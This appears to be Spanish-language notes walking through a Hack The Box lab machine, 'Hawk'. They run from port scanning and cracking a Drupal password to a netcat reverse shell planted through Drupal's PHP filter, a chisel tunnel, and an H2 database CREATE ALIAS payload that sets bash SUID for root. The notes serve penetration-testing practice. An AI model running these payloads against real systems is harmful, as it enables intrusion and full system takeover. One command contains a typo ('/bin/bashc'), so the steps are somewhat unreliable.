mkdir hawk
cd !$
mkt
cd nmap
nmap -p- --open -T5 -v -n 10.129.95.193
nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.129.95.193 -oG allPorts
extractPorts allPorts
nmap -sCV -p80,21,22,5435,8082,9092 10.129.95.193 -oN targeted
whatweb http://10.129.95.193
ftp 10.129.95.193
get .drupal.txt.enc
cat .drupal.txt.enc
cat .drupal.txt.enc | xargs | tr -d '' | base64 -d > drupal.txt
./bruteforce.sh
cat drupal.txt
Encontramos que la contrasena es PencilKeyboardScanner123
Vamos a http://10.129.95.193:8082
Metemos las credenciales admin:PencilKeyboardScanner123
Ya en drupal vamos a modules y escogemos PHP filter.
Escribimos el script de un reverse shell
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.108 443 >/tmp/f "); ?>Y escogemos PHP code como formato de texto
git clone https://github.com/jpillora/chisel
go build -ldflags "-s -w" .
du -hc chisel
python3 -m http.server 80
wget http://10.10.14.108/chisel
chmod +x chisel
En la maquina kali
./chisel server --reverse -p 1234
En la maquina atacada
./chisel client 10.10.14.108:1234 R:8082:127.0.0.1:8082
Vamos a la pagina localhost:8082. Cambiamos el URL de test a otro nombre y le damos click a Preferences
Escogemos la opcion de Allow connections from other computers
Ya deberia de cambiar el url de test a otro nombre. Aqui puse uno. Le damos click a Connect
ps -faux | grep -i h2-l
Vemos el siguiente exploit: https://www.exploit-db.com/exploits/45506
CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$
CALL EXECVE('chmod 4775 /bin/bashc')
Lo corremos y ya deberiamos de tener un root shell.